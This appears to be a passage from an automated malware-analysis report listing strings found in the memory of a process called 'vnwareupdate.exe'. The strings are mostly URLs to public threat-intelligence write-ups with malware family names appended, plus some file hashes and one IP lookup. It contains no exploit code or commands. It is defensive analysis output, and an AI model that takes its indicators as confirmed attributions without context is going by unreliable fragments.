Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-052206-5950-99UPS:
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-052206-5950-99WannaCry
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-052206-5950-99Zero-day
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-062915-5446-99
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-062915-5446-99Futurax
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-062915-5446-99MyKings
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-070611-0813-99
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-070611-0813-99H-Worm
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-070611-0813-99WAP-billing
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-073103-3836-99Dreambot
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-073103-3836-99Karagany.B
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-073103-3836-99New
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2018-021208-2435-99
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2018-021208-2435-99Ransom.ShurL0ckr
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2018-021208-2435-99aOperation
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://www.theregister.co.uk/2018/01/16/arc_iot_botnet_malware/
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/blog/divide-and-conquer/
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/blog/divide-and-conquer/Rescoms
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/blog/divide-and-conquer/Unmasking
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/blog/divide-and-conquer/eraUnmasking
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/blog/divide-and-conquer/ilUnmasking
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/blog/divide-and-conquer/raUnmasking
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/blog/divide-and-conquer/reUnmasking
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/blog/khaan-quest-chinese-cyber-espionage-targeting
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/blog/khaan-quest-chinese-cyber-espionage-targetingCNACOM
Source: vnwareupdate.exe, 00000003.00000003.241767951.0000000005691000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/blog/killing-with-a-borrowed-knife-chaining-core-c
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/blog/killing-with-a-borrowed-knife-chaining-core-cRetefe
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/blog/killing-with-a-borrowed-knife-chaining-core-cYayih
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/blog/operation-poisoned-helmand/
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/blog/where-there-is-smoke-there-is-fire-south-asia
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/china-hacks-the-peace-palace-all-your-eezs-are-bel
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatconnect.com/china-hacks-the-peace-palace-all-your-eezs-are-belChina
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-/EVASIVE
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-nEVASIVE
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-tRocket
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: https://www.threatstream.com/blog/three-month-frameworkpos-malware-campaign-nabs
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	String found in binary or memory: https://www.tr1adx.net/intel/TIB-00002.html
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.tr1adx.net/intel/TIB-00002.htmlBBSRAT
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.tr1adx.net/intel/TIB-00002.htmlThe
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.tr1adx.net/intel/TIB-00002.htmlUnusual
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_rescoms.ai
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_rescoms.aieraRescoms
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_rescoms.aiilRescoms
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_rescoms.aireRescoms
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.236671866.0000000005A91000.00000004.00000001.sdmp	String found in binary or memory: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-pape
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papeIXESHE
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papeSanny
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: https://www.trustwave.com/Resources/SpiderLabs-Blog/KOVTER-and-CERBER-on-a-One-T
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.trustwave.com/Resources/SpiderLabs-Blog/KOVTER-and-CERBER-on-a-One-TKOVTER
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Carbanak-/-Anunak-Attack
Source: vnwareupdate.exe, 00000003.00000003.245614299.0000000003AA7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	String found in binary or memory: https://www.trustwave.com/Resources/SpiderLabs-Blog/Post-Soviet-Bank-Heists---A-
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.trustwave.com/Resources/SpiderLabs-Blog/Post-Soviet-Bank-Heists---A-Post-Soviet
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.trustwave.com/Resources/SpiderLabs-Blog/Post-Soviet-Bank-Heists---A-SYSCON
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-Macro
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-Quaverse
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2New
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2Tale
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://www.trustwave.com/Resources/SpiderLabs-Blog/Terror-Exploit-Kit--More-lik
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://www.u-toyama.ac.jp/news/2016/doc/1011.pdf
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/ncas/alerts/AA19-024A
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/ncas/alerts/TA14-353A?utm_source=twitterfeed&utm_medium=
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/ncas/alerts/TA14-353A?utm_source=twitterfeed&utm_medium=Spearphishing
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/ncas/alerts/TA14-353A?utm_source=twitterfeed&utm_medium=Unusual
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/ncas/alerts/TA14-353A?utm_source=twitterfeed&utm_medium=fSkygofree:
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/ncas/alerts/TA17-164A6566a8c1b8b73f10205b6b1e8757cee8489e8f756e4d0ad37a314f2
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/ncas/alerts/TA17-164A83e7aaf52e5f567349eee880b0626e61e97dc12b8db9966faf55a99
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/ncas/alerts/TA17-318A
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/ncas/alerts/TA17-318B
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/ncas/alerts/TA18-074A
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/ncas/analysis-reports/AR18-165A
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publ
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publ3Malware
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publB5Malware
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publDownloaders
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publEvasive
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publMalware
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publThe_Mirage_Campaign.pdf
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publcMalware
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publeMalware
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD0Bankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD1Truebot.A
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD3Bankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD5Bankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD8
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD8Bankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD9Bankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDABankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDOBankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDOThe
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD_Bankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDaBankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDbBankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDcBankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDdBankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDfBankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDh
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDiBankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDoBankshot
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDtBankshot
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.us-cert.gov/sites/default/files/publyMalware
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.virustotal.com/en/file/070ee4a40852b26ec0cfd79e32176287a6b9d2b15e377281d8414550a83f6496/
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: https://www.virustotal.com/en/file/975e515bbf8828b103b05039fe86afad7da43b043d
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.virustotal.com/en/file/975e515bbf8828b103b05039fe86afad7da43b043dBBSRAT
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.virustotal.com/en/file/975e515bbf8828b103b05039fe86afad7da43b043dRussia
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.virustotal.com/en/file/ee069edc46a18698fa99b6d2204895e6a516af1a306ea986a798b178f289ecd6/
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://www.virustotal.com/en/ip-address/188.128.173.225/information/
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: https://www.virustotal.com/fr/file/740d3a1b84e274ad36c6811ee597851b279aa893de6be
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://www.volexity.com/blog/2014/10/09/democracy-in-hong-kong-under-attack/
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://www.volexity.com/blog/2014/10/09/democracy-in-hong-kong-under-attack/UnDemocracy
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://www.volexity.com/blog/2014/10/09/democracy-in-hong-kong-under-attack/asDemocracy
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://www.volexity.com/blog/2014/10/09/democracy-in-hong-kong-under-attack/g
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://www.volexity.com/blog/2014/10/09/democracy-in-hong-kong-under-attack/reDemocracy
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-tar
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-tarReal
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-tarRussia
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: https://www.votiro.com/single-post/2017/08/23/Votiro-Labs-exposed-a-new-hacking-
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.votiro.com/single-post/2017/08/23/Votiro-Labs-exposed-a-new-hacking-&#39
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.votiro.com/single-post/2017/08/23/Votiro-Labs-exposed-a-new-hacking-Campaign
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-sta
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-sta.
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-staCarbon
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-staOperation
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-Turlas
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/.0
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/It
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/JS_POWMET
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/ppendixes.pdf8
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmediaFreeMilk:
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmediaOSX/Proton
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmediacators_of_compromise
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-di
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diAnalyzing
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diBadRabbit
